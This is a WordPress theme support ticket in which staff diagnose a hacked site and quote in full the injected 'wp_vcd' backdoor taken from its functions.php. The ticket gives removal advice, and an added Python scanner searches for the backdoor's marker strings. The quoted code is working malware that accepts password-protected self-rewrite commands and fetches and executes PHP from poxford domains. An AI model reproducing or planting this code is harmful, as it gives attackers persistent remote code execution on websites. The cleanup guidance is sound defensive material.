  Public Ticket #1529689
Notice: Use of undefined constant REQUEST_URI
Closed

Comments

  • Ritchy started the conversation

    Hey, we're seeing a recent error display on the live site [and backend]:



    Notice: Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' in /home/[removed]/public_html/wp-content/themes/thegem-child/functions.php on line 73


    - Line 73:

    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];


    - Line 70 - 87:

    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }


  •   Ritchy replied privately
  • Oliver replied

    Hi,

    Your site has been hacked.

    I removed malicious code from the functions.php of the main theme and child theme. You need to check all the themes you installed and remove this code:

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'c3538061d6bf79239fd56bdddba9974d'))
        {
    $div_code_name="wp_vcd";
            switch ($_REQUEST['action'])
                {
                    
                    case 'change_domain';
                        if (isset($_REQUEST['newdomain']))
                            {
                                
                                if (!empty($_REQUEST['newdomain']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {
                                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                           @file_put_contents(__FILE__, $file);
                                                                   print "true";
                                                                                                                 }
                                                                                }
                                    }
                            }
                    break;
                                    case 'change_code';
                        if (isset($_REQUEST['newcode']))
                            {
                                
                                if (!empty($_REQUEST['newcode']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {
                                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                           @file_put_contents(__FILE__, $file);
                                                                   print "true";
                                                                                                                 }
                                                                                }
                                    }
                            }
                    break;
                    
                    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
                }
                
            die("");
        }
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
               {
               }
                else
                {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                }
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            
    $wp_auth_key='b3de80aaa27f65938be458451c3ac075';
            if (($tmpcontent = @file_get_contents("http://www.poxford.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.poxford.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
            
            
            elseif ($tmpcontent = @file_get_contents("http://www.poxford.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
               
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
            } elseif (($tmpcontent = @file_get_contents("http://www.poxford.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.poxford.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
            }
            
            
            
            
            
        }
    }
    //$start_wp_theme_tmp
    //wp_tmp
    //$end_wp_theme_tmp
    ?> 

    Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list. 

    Regards, Oliver

  • Ritchy replied

    Thank you so much Gregor!


    All the themes currently installed are from WordPress, but if anyone else is curious we've deleted the following themes completely:

    • SocialMag
    • Leto
    • PhotoBlogster
    • ClubFitness


    We only have TheGem + Child Theme and WordPress' Twenty Fifteen, Sixteen, and Seventeen default themes. Let us know if we should scan/delete those as well. We did not install those, they came with WordPress.



     Should we install a security plugin? What do you recommend we do now?

  • Oliver replied

    Try to download all of WordPress to your PC and search for:

    $div_code_name="wp_vcd";

    So you'll see where the malicious code was added... Afterwards, remove it on your server.

    Regards, Oliver

  • Ritchy replied

    I can't search directly in files using FileZilla (FTP).


    I'm recommended to use something called SSH and

    grep -rli "searchstring" *


    Can I copy the entire public_html folder from FileZilla to my PC and search using Windows Explorer?

  • Oliver replied

    Yes.

    Regards, Oliver
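
A scanner for the search discussed above, run over a local copy of the site (an added example, not code from the ticket or the theme vendor). It matches marker strings visible in the quoted code and flags any `wp-tmp.php`, the cache file that code writes; the sample tree is constructed and the label names are this example's own.

```python
import re
import tempfile
from pathlib import Path

# Markers copied from the injected code quoted in this thread.
MARKERS = {
    "div_code_name": re.compile(rb"\$div_code_name\s*=\s*[\"']wp_vcd[\"']"),
    "theme_temp_setup": re.compile(rb"function\s+theme_temp_setup\s*\("),
    "update_block": re.compile(rb"//\$start_wp_theme_tmp"),
}
DROPPED_NAME = "wp-tmp.php"  # cache file the injected code writes


def scan_tree(root):
    """Return sorted (relative_path, marker, line_no) findings under root."""
    findings = []
    for path in Path(root).rglob("*.php"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name == DROPPED_NAME:
            findings.append((rel, "dropped_file", 0))
        data = path.read_bytes()
        for label, rx in MARKERS.items():
            m = rx.search(data)
            if m:  # 1-based line number of the first hit
                findings.append((rel, label, data.count(b"\n", 0, m.start()) + 1))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample: infected theme, clean theme, dropped cache file."""
    samples = {
        "wp-content/themes/twentysixteen/functions.php":
            b"<?php\n$div_code_name = \"wp_vcd\";\n//$start_wp_theme_tmp\n",
        "wp-content/themes/twentyfifteen/functions.php":
            b"<?php\nadd_action('init', 'my_setup');\n",
        "wp-includes/wp-tmp.php": b"<?php // constructed placeholder\n",
    }
    for rel, body in samples.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(*scan_tree(tmp), sep="\n")
```

Call `scan_tree` on the downloaded copy of `public_html`; the `\s*` in the first pattern matches the marker with or without spaces around `=`, both of which appear in the code quoted in this thread.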

  •   Ritchy replied privately
  • Oliver replied

    No, you didn't remove it, example:

    /public_html/wp-content/themes/twentysixteen/functions.php

    At the top

    Regards, Oliver

  •   Ritchy replied privately
  • Oliver replied

    Change the passwords for FTP and WP admin, and don't install themes and plugins from unverified sources.

    Regards, Oliver

  • Ritchy replied

    Thank you very much. All themes are from the WordPress repository but I will change my FTP & WP admin pass now. Did you also find the malicious code in one of our plugins?

    We are still unsure where the hack came from. We don't know how to really prevent this in the future.

  • Oliver replied

    I didn't look in the plugins. You need to find the malicious code yourself.

    Regards, Oliver

  • Ritchy replied

    um...??  I was not asking you to check my plugins. You said not to install plugins from unverified sources...

    You made it sound like you had found something malicious.

    But thanks anyway I guess

  • Oliver replied

    Hi,

    Most likely you got this issue from one of the third-party plugins. So in my mind you need to check the folder:

    /wp-content/plugins

    Deeply. 

    Regards, Oliver